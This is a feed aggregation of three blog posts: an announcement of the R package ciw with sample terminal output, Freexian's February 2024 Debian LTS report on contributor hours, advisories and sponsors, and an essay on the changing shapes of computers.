Package!http://dirk.eddelbuettel.com/blog/2024/03/13#ciw_0.0.12024-03-14T00:03:00+00:00<p>Happy to share that <a href="https://dirk.eddelbuettel.com/code/ciw.html">ciw</a> is now on <a href="https://cran.r-project.org">CRAN</a>! I had tooted a little bit
about it, <em>e.g.</em>, <a href="https://mastodon.social/@eddelbuettel/112016349028986595">here</a>.
What it provides is a single (efficient) function
<code>incoming()</code> which summarises the state of the incoming
directories at <a href="https://cran.r-project.org">CRAN</a>. I happen
to like having these things at my (shell) fingertips, so it goes along
with (still draft) <a href="https://github.com/eddelbuettel/littler/blob/master/inst/examples/ciw.r">wrapper
ciw.r</a> that will be part of the next <a href="https://github.com/eddelbuettel/littler">littler</a> release.</p>
<p>For example, when I do this right now as I type this, I see</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode sh"><code class="sourceCode bash"><span id="cb1-1"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-1" tabindex="-1"></a><span class="ex">edd@rob:~$</span> ciw.r</span>
<span id="cb1-2"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-2" tabindex="-1"></a> <span class="ex">Folder</span> Name Time Size Age</span>
<span id="cb1-3"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-3" tabindex="-1"></a> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>POSc<span class="op">></span> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>difftime<span class="op">></span></span>
<span id="cb1-4"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-4" tabindex="-1"></a><span class="ex">1:</span> waiting maximin_1.0-5.tar.gz 2024-03-13 22:22:00 20K 2.48 hours</span>
<span id="cb1-5"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-5" tabindex="-1"></a><span class="ex">2:</span> inspect GofCens_0.97.tar.gz 2024-03-13 21:12:00 29K 3.65 hours</span>
<span id="cb1-6"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-6" tabindex="-1"></a><span class="ex">3:</span> inspect verbalisr_0.5.2.tar.gz 2024-03-13 20:09:00 79K 4.70 hours</span>
<span id="cb1-7"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-7" tabindex="-1"></a><span class="ex">4:</span> waiting rnames_1.0.1.tar.gz 2024-03-12 15:04:00 2.7K 33.78 hours</span>
<span id="cb1-8"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-8" tabindex="-1"></a><span class="ex">5:</span> waiting PCMBase_1.2.14.tar.gz 2024-03-10 12:32:00 406K 84.32 hours</span>
<span id="cb1-9"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-9" tabindex="-1"></a><span class="ex">6:</span> pending MPCR_1.1.tar.gz 2024-02-22 11:07:00 903K 493.73 hours</span>
<span id="cb1-10"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-10" tabindex="-1"></a><span class="ex">edd@rob:~$</span> </span></code></pre></div>
<p>which is rather compact as <a href="https://cran.r-project.org">CRAN</a> kept busy! This call runs in
about (or just over) one second, which includes launching
<code>r</code>. Good enough for me. From a well-connected EC2 instance
it is about 800ms on the command-line. When I do I from here inside an R
session it is maybe 700ms. And doing it over in Europe is faster still.
(I am using <code>ping=FALSE</code> for these to omit the default sanity
check of ‘can I haz networking?’ to speed things up. The check adds
another 200ms or so.)</p>
<p>The function (and the wrapper) offer a ton of options too this is
ridiculously easy to do thanks to the <a href="https://cloud.r-project.org/package=docopt">docopt</a>
package:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode sh"><code class="sourceCode bash"><span id="cb2-1"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-1" tabindex="-1"></a><span class="ex">edd@rob:~$</span> ciw.r <span class="at">-x</span></span>
<span id="cb2-2"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-2" tabindex="-1"></a><span class="ex">Usage:</span> ciw.r [-h] [-x] [-a] [-m] [-i] [-t] [-p] [-w] [-r] [-s] [-n] [-u] [-l rows] [-z] [ARG...]</span>
<span id="cb2-3"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-3" tabindex="-1"></a></span>
<span id="cb2-4"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-4" tabindex="-1"></a><span class="ex">-m</span> <span class="at">--mega</span> use <span class="st">'mega'</span> mode of all folders <span class="er">(</span><span class="ex">see</span> <span class="at">--usage</span><span class="kw">)</span></span>
<span id="cb2-5"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-5" tabindex="-1"></a><span class="ex">-i</span> <span class="at">--inspect</span> visit <span class="st">'inspect'</span> folder</span>
<span id="cb2-6"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-6" tabindex="-1"></a><span class="ex">-t</span> <span class="at">--pretest</span> visit <span class="st">'pretest'</span> folder</span>
<span id="cb2-7"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-7" tabindex="-1"></a><span class="ex">-p</span> <span class="at">--pending</span> visit <span class="st">'pending'</span> folder</span>
<span id="cb2-8"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-8" tabindex="-1"></a><span class="ex">-w</span> <span class="at">--waiting</span> visit <span class="st">'waiting'</span> folder</span>
<span id="cb2-9"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-9" tabindex="-1"></a><span class="ex">-r</span> <span class="at">--recheck</span> visit <span class="st">'waiting'</span> folder</span>
<span id="cb2-10"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-10" tabindex="-1"></a><span class="ex">-a</span> <span class="at">--archive</span> visit <span class="st">'archive'</span> folder</span>
<span id="cb2-11"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-11" tabindex="-1"></a><span class="ex">-n</span> <span class="at">--newbies</span> visit <span class="st">'newbies'</span> folder</span>
<span id="cb2-12"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-12" tabindex="-1"></a><span class="ex">-u</span> <span class="at">--publish</span> visit <span class="st">'publish'</span> folder</span>
<span id="cb2-13"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-13" tabindex="-1"></a><span class="ex">-s</span> <span class="at">--skipsort</span> skip sorting of aggregate results by age</span>
<span id="cb2-14"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-14" tabindex="-1"></a><span class="ex">-l</span> <span class="at">--lines</span> rows print top <span class="st">'rows'</span> of the result object [default: 50]</span>
<span id="cb2-15"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-15" tabindex="-1"></a><span class="ex">-z</span> <span class="at">--ping</span> run the connectivity check first</span>
<span id="cb2-16"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-16" tabindex="-1"></a><span class="ex">-h</span> <span class="at">--help</span> show this help text</span>
<span id="cb2-17"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-17" tabindex="-1"></a><span class="ex">-x</span> <span class="at">--usage</span> show help and short example usage </span>
<span id="cb2-18"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-18" tabindex="-1"></a></span>
<span id="cb2-19"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-19" tabindex="-1"></a><span class="ex">where</span> ARG... can be one or more file name, or directories or package names.</span>
<span id="cb2-20"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-20" tabindex="-1"></a></span>
<span id="cb2-21"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-21" tabindex="-1"></a><span class="ex">Examples:</span></span>
<span id="cb2-22"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-22" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="at">-ip</span> <span class="co"># run in 'inspect' and 'pending' mode</span></span>
<span id="cb2-23"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-23" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="at">-a</span> <span class="co"># run with mode 'auto' resolved in incoming()</span></span>
<span id="cb2-24"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-24" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="co"># run with defaults, same as '-itpwr'</span></span>
<span id="cb2-25"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-25" tabindex="-1"></a></span>
<span id="cb2-26"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-26" tabindex="-1"></a><span class="ex">When</span> no argument is given, <span class="st">'auto'</span> is selected which corresponds to <span class="st">'inspect'</span>, <span class="st">'waiting'</span>,</span>
<span id="cb2-27"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-27" tabindex="-1"></a><span class="st">'pending'</span><span class="ex">,</span> <span class="st">'pretest'</span>, and <span class="st">'recheck'</span>. Selecting <span class="st">'-m'</span> or <span class="st">'--mega'</span> are select as default.</span>
<span id="cb2-28"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-28" tabindex="-1"></a></span>
<span id="cb2-29"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-29" tabindex="-1"></a><span class="ex">Folder</span> selecting arguments are cumulative<span class="kw">;</span> <span class="ex">but</span> <span class="st">'mega'</span> is a single selections of all folders</span>
<span id="cb2-30"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-30" tabindex="-1"></a><span class="kw">(</span><span class="ex">i.e.</span> <span class="st">'inspect'</span>, <span class="st">'waiting'</span>, <span class="st">'pending'</span>, <span class="st">'pretest'</span>, <span class="st">'recheck'</span>, <span class="st">'archive'</span>, <span class="st">'newbies'</span>, <span class="st">'publish'</span><span class="kw">)</span><span class="bu">.</span></span>
<span id="cb2-31"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-31" tabindex="-1"></a></span>
<span id="cb2-32"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-32" tabindex="-1"></a><span class="ex">ciw.r</span> is part of littler which brings <span class="st">'r'</span> to the command-line.</span>
<span id="cb2-33"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-33" tabindex="-1"></a><span class="ex">See</span> https://dirk.eddelbuettel.com/code/littler.html for more information.</span>
<span id="cb2-34"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-34" tabindex="-1"></a><span class="ex">edd@rob:~$</span> </span></code></pre></div>
<p>The README at the <a href="https://github.com/eddelbuettel/ciw">git
repo</a> and the <a href="https://cran.r-project.org/package=ciw">CRAN
page</a> offer a ‘screenshot movie’ showing some of the options in
action.</p>
<p>I have been using the little tools quite a bit over the last two or
three weeks since I first put it together and find it quite handy. With
that again a big <em>Thank You!</em> of appcreciation for all that <a href="https://cran.r-project.org">CRAN</a> does—which this week included
letting this past the <em>newbies</em> desk in under 24 hours.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>Dirk Eddelbuettelhttp://dirk.eddelbuettel.com/blogMonthly report about Debian Long Term Support, February 2024 (by Roberto C. Sánchez)https://www.freexian.com/blog/debian-lts-report-2024-02/2024-03-14T00:00:00+00:00<img src="https://www.freexian.com/images/debian-lts-logo.png" style="float: right;" />
<p>Like each month, have a look at the work funded by <a href="https://www.freexian.com/lts/debian/">Freexian’s Debian LTS offering</a>.</p>
<h3 id="debian-lts-contributors">Debian LTS contributors</h3>
<p>In February, 18 contributors have been paid to work on <a href="https://wiki.debian.org/LTS">Debian
LTS</a>, their reports are available:</p>
<ul>
<li><a href="https://people.debian.org/~abhijith/reports/LTS_ELTS-February-2024.txt">Abhijith PA</a>
did 10.0h (out of 14.0h assigned), thus carrying over 4.0h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00008.html">Adrian Bunk</a>
did 13.5h (out of 24.25h assigned and 41.75h from previous period), thus carrying over 52.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00007.html">Bastien Roucariès</a>
did 20.0h (out of 20.0h assigned).</li>
<li><a href="https://www.decadent.org.uk/ben/blog/2024/03/03/foss-activity-in-february-2024.html">Ben Hutchings</a>
did 2.0h (out of 14.5h assigned and 9.5h from previous period), thus carrying over 22.0h to the next month.</li>
<li><a href="https://chris-lamb.co.uk/posts/free-software-activities-in-february-2024#debian-lts">Chris Lamb</a>
did 18.0h (out of 18.0h assigned).</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00009.html">Daniel Leidert</a>
did 10.0h (out of 10.0h assigned).</li>
<li><a href="https://people.debian.org/~pochu/lts/reports/2024-02.txt">Emilio Pozuelo Monfort</a>
did 3.0h (out of 28.25h assigned and 31.75h from previous period), thus carrying over 57.0h to the next month.</li>
<li><a href="https://lists.debian.org/msgid-search/?m=wr9W91X07BdEqlUY@debian.org">Guilhem Moulin</a>
did 7.25h (out of 4.75h assigned and 15.25h from previous period), thus carrying over 12.75h to the next month.</li>
<li>Holger Levsen
did 0.5h (out of 3.5h assigned and 8.5h from previous period), thus carrying over 11.5h to the next month.</li>
<li>Lee Garrett
did 0.0h (out of 18.25h assigned and 41.75h from previous period), thus carrying over 60.0h to the next month.</li>
<li><a href="https://dl.gambaru.de/blog/202402_LTS_report.txt">Markus Koschany</a>
did 40.0h (out of 40.0h assigned).</li>
<li><a href="https://people.debian.org/~roberto/lts_elts_reports/2024-02.txt">Roberto C. Sánchez</a>
did 3.5h (out of 8.75h assigned and 3.25h from previous period), thus carrying over 8.5h to the next month.</li>
<li><a href="https://people.debian.org/~santiago/lts-elts-reports/report-2024-02.txt">Santiago Ruano Rincón</a>
did 13.5h (out of 13.5h assigned and 2.5h from previous period), thus carrying over 2.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00001.html">Sean Whitton</a>
did 4.5h (out of 0.5h assigned and 5.5h from previous period), thus carrying over 1.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00003.html">Sylvain Beucler</a>
did 24.5h (out of 27.75h assigned and 32.25h from previous period), thus carrying over 35.5h to the next month.</li>
<li><a href="http://blog.alteholz.eu/2024/03/my-debian-activities-in-february-2024/">Thorsten Alteholz</a>
did 14.0h (out of 14.0h assigned).</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00005.html">Tobias Frost</a>
did 12.0h (out of 12.0h assigned).</li>
<li><a href="https://utkarsh2102.org/posts/foss-in-feb-24/">Utkarsh Gupta</a>
did 11.25h (out of 26.75h assigned and 33.25h from previous period), thus carrying over 48.75 to the next month.</li>
</ul>
<h3 id="evolution-of-the-situation">Evolution of the situation</h3>
<p>In February, we have released <a href="https://lists.debian.org/debian-lts-announce/2024/02/threads.html">17 DLAs</a>.</p>
<p>The number of DLAs published during February was a bit lower than usual, as there was much work going on in the area of triaging CVEs (a number of which turned out to not affect Debia buster, and others which ended up being duplicates, or otherwise determined to be invalid). Of the packages which did receive updates, notable were <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html">sudo</a> (to fix a privilege management issue), and <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00008.html">iwd</a> and <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00013.html">wpa</a> (both of which suffered from authentication bypass vulnerabilities).</p>
<p>While this has already been already announced in the Freexian blog, we would like to mention here the start of the <a href="https://www.freexian.com/blog/samba-4.17-lts/">Long Term Support project for Samba 4.17</a>. You can find all the important details in that post, but we would like to highlight that it is thanks to our LTS sponsors that we are able to fund the work from our partner, <a href="https://www.catalyst.net.nz/samba-and-windows-integration">Catalyst</a>, towards improving the security support of Samba in Debian 12 (Bookworm).</p>
<h3 id="thanks-to-our-sponsors">Thanks to our sponsors</h3>
<p>Sponsors that joined recently are in bold.</p>
<ul>
<li>Platinum sponsors:
<ul>
<li><a href="http://www.toshiba.co.jp/worldwide/index.html">TOSHIBA</a> (for 102 months)</li>
<li><a href="https://cip-project.org">Civil Infrastructure Platform (CIP)</a> (for 70 months)</li>
</ul>
</li>
<li>Gold sponsors:
<ul>
<li><a href="https://www.roche.com/about/business/diagnostics.htm">Roche Diagnostics International AG</a> (for 113 months)</li>
<li><a href="http://www.linode.com">Linode</a> (for 107 months)</li>
<li><a href="http://www.babiel.com">Babiel GmbH</a> (for 96 months)</li>
<li><a href="https://www.plathome.com">Plat’Home</a> (for 96 months)</li>
<li><a href="https://www.cineca.it">CINECA</a> (for 70 months)</li>
<li><a href="http://www.ox.ac.uk">University of Oxford</a> (for 52 months)</li>
<li><a href="https://deveryware.com">Deveryware</a> (for 39 months)</li>
<li><a href="https://vyos.io">VyOS Inc</a> (for 34 months)</li>
<li><a href="https://www.edf.fr">EDF SA</a> (for 23 months)</li>
</ul>
</li>
<li>Silver sponsors:
<ul>
<li><a href="http://www.domainnameshop.com">Domeneshop AS</a> (for 117 months)</li>
<li><a href="http://www.nantesmetropole.fr/">Nantes Métropole</a> (for 112 months)</li>
<li><a href="http://www.univention.de">Univention GmbH</a> (for 103 months)</li>
<li><a href="http://portail.univ-st-etienne.fr/">Université Jean Monnet de St Etienne</a> (for 103 months)</li>
<li><a href="https://ribboncommunications.com/">Ribbon Communications, Inc.</a> (for 97 months)</li>
<li><a href="https://www.exonet.nl">Exonet B.V.</a> (for 87 months)</li>
<li><a href="https://www.lrz.de">Leibniz Rechenzentrum</a> (for 81 months)</li>
<li><a href="https://www.diplomatie.gouv.fr">Ministère de l’Europe et des Affaires Étrangères</a> (for 64 months)</li>
<li><a href="https://www.cloudways.com">Cloudways by DigitalOcean</a> (for 54 months)</li>
<li><a href="https://dinahosting.com">Dinahosting SL</a> (for 52 months)</li>
<li><a href="https://www.bauermedia.com">Bauer Xcel Media Deutschland KG</a> (for 46 months)</li>
<li><a href="https://platform.sh">Platform.sh SAS</a> (for 46 months)</li>
<li><a href="https://www.moxa.com">Moxa Inc.</a> (for 40 months)</li>
<li><a href="https://sipgate.de">sipgate GmbH</a> (for 37 months)</li>
<li><a href="https://ovhcloud.com">OVH US LLC</a> (for 35 months)</li>
<li><a href="https://www.tilburguniversity.edu/">Tilburg University</a> (for 35 months)</li>
<li><a href="https://www.gsi.de">GSI Helmholtzzentrum für Schwerionenforschung GmbH</a> (for 27 months)</li>
<li><a href="https://www.soliton.co.jp">Soliton Systems K.K.</a> (for 24 months)</li>
</ul>
</li>
<li>Bronze sponsors:
<ul>
<li><a href="http://www.evolix.fr">Evolix</a> (for 118 months)</li>
<li><a href="http://www.seznam.cz">Seznam.cz, a.s.</a> (for 118 months)</li>
<li><a href="http://intevation.de">Intevation GmbH</a> (for 115 months)</li>
<li><a href="http://linuxhotel.de">Linuxhotel GmbH</a> (for 115 months)</li>
<li><a href="https://waays.fr">Daevel SARL</a> (for 113 months)</li>
<li><a href="http://bitfolk.com">Bitfolk LTD</a> (for 112 months)</li>
<li><a href="http://www.megaspace.de">Megaspace Internet Services GmbH</a> (for 112 months)</li>
<li><a href="http://numlog.fr">NUMLOG</a> (for 112 months)</li>
<li><a href="http://www.greenbone.net">Greenbone AG</a> (for 111 months)</li>
<li><a href="http://www.wingo.ch/">WinGo AG</a> (for 111 months)</li>
<li><a href="http://lheea.ec-nantes.fr">Ecole Centrale de Nantes - LHEEA</a> (for 107 months)</li>
<li><a href="https://www.entrouvert.com/">Entr’ouvert</a> (for 102 months)</li>
<li><a href="https://adfinis.com">Adfinis AG</a> (for 99 months)</li>
<li><a href="http://www.allogarage.fr">GNI MEDIA</a> (for 94 months)</li>
<li><a href="http://www.legi.grenoble-inp.fr">Laboratoire LEGI - UMR 5519 / CNRS</a> (for 94 months)</li>
<li><a href="https://www.tesorion.nl/">Tesorion</a> (for 94 months)</li>
<li><a href="http://bearstech.com">Bearstech</a> (for 85 months)</li>
<li><a href="http://lihas.de">LiHAS</a> (for 85 months)</li>
<li><a href="http://www.catalyst.net.nz">Catalyst IT Ltd</a> (for 80 months)</li>
<li><a href="http://www.supagro.fr">Supagro</a> (for 75 months)</li>
<li><a href="https://demarcq.net">Demarcq SAS</a> (for 74 months)</li>
<li><a href="https://www.univ-grenoble-alpes.fr">Université Grenoble Alpes</a> (for 60 months)</li>
<li><a href="https://www.touchweb.fr">TouchWeb SAS</a> (for 52 months)</li>
<li><a href="https://www.spin-ag.de">SPiN AG</a> (for 49 months)</li>
<li><a href="https://www.corefiling.com">CoreFiling</a> (for 44 months)</li>
<li><a href="http://www.isc.cnrs.fr">Institut des sciences cognitives Marc Jeannerod</a> (for 39 months)</li>
<li><a href="https://www.osug.fr/">Observatoire des Sciences de l’Univers de Grenoble</a> (for 36 months)</li>
<li><a href="https://www.werfen.com">Tem Innovations GmbH</a> (for 31 months)</li>
<li><a href="https://wordfinder.pro">WordFinder.pro</a> (for 30 months)</li>
<li><a href="https://www.resif.fr">CNRS DT INSU Résif</a> (for 29 months)</li>
<li><a href="https://www.alterway.fr">Alter Way</a> (for 22 months)</li>
<li><a href="https://math.univ-lyon1.fr">Institut Camille Jordan</a> (for 11 months)</li>
</ul>
</li>
</ul>Roberto C. Sánchezhttps://www.freexian.com/tags/planet-debian/The Shape of Computershttps://etbe.coker.com.au/?p=54312024-03-13T12:16:01+00:00<h2>Introduction</h2>
<p>There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to.</p>
<p>This means that further development in the size and shape of computers will largely be determined by human factors.</p>
<p>I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.</p>
<p>Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.</p>
<h2>Desktop/Laptop PCs</h2>
<p>When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the <a href="https://www.raspberrypi.com/products/raspberry-pi-400/">Raspberry Pi 400 [1]</a> which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a “add a screen to make a laptop” as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.</p>
<p>The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.</p>
<p>The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment <a href="https://jenson.org/text/">text editing with a touch screen is an unsolved problem in computer science [2]</a>.</p>
<p>The <a href="https://www.zdnet.com/article/lenovos-thinkpad-x1-fold-is-the-most-bizarre-fun-and-expensive-laptop-ive-ever-tested/">Lenovo Thinkpad X1 Fold [3]</a> and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US.</p>
<p>I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don’t work well for small devices and touch devices and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.</p>
<p>We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn’t take off largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.</p>
<h2>The Interesting New Things</h2>
<h3>Watch Like</h3>
<p>The <a href="https://en.wikipedia.org/wiki/Watch">wrist-watch [4]</a> has been a standard format for easy access to data when on the go since it’s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as “pocket watches” for about 10 years.</p>
<p>The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the <a href="https://en.wikipedia.org/wiki/Calculator_watch">calculator watch [5]</a> which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?</p>
<h3>Phone Like</h3>
<p>Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). <a href="https://www.notebookcheck.net/Huawei-and-Samsung-reportedly-launching-foldable-tablets-onto-the-market-soon-while-Oppo-and-Vivo-are-pulling-out.803325.0.html">Phones and tablets with multiple folds are coming out now [6]</a>. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. <a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/">I’ve previously written about Convergence between phones and desktop computers [7]</a>, the increased capabilities of phones adds to the case for Convergence.</p>
<p>Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them), it will be interesting to see how that goes.</p>
<p>Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that’s enough for a lot of phone functionality.</p>
<p>The <a href="https://www.theverge.com/2024/1/9/24030667/rabbit-r1-ai-action-model-price-release-date">Rabbit R1 [8]</a> and the <a href="https://www.theverge.com/2023/11/8/23953022/humane-ai-pin-price-specs-leak">Humane AI Pin [9]</a> have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.</p>
<h3>Laptop Like</h3>
<p>One interesting PC variant I just discovered is the <a href="https://www.aliexpress.com/store/1103322555">Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]</a>. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.</p>
<p>The recent release of the <a href="https://en.wikipedia.org/wiki/Apple_Vision_Pro">Apple Vision Pro [11]</a> has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about <a href="https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/">the possibility of using augmented reality technology for providing a desktop computing environment [12]</a>. I wonder how a Vision Pro would work for that on a train or passenger jet.</p>
<p>Another interesting thing that’s on offer is a <a href="https://www.aliexpress.com/item/1005005999353358.html">laptop with 7″ touch screen beside the keyboard [13]</a>. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.</p>
<h2>Useful Hardware for Developing These Things</h2>
<p><a href="https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/">I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14]</a>, and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap.</p>
<p><a href="https://etbe.coker.com.au/2023/10/21/more-about-pinetime/">The PineTime is a nice smart watch from Pine64 which is designed to be open [15]</a>. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the <a href="https://www.raspberrypi.com/news/how-to-build-your-own-raspberry-pi-watch/">Raspberry Pi Watch [16]</a> is interesting too.</p>
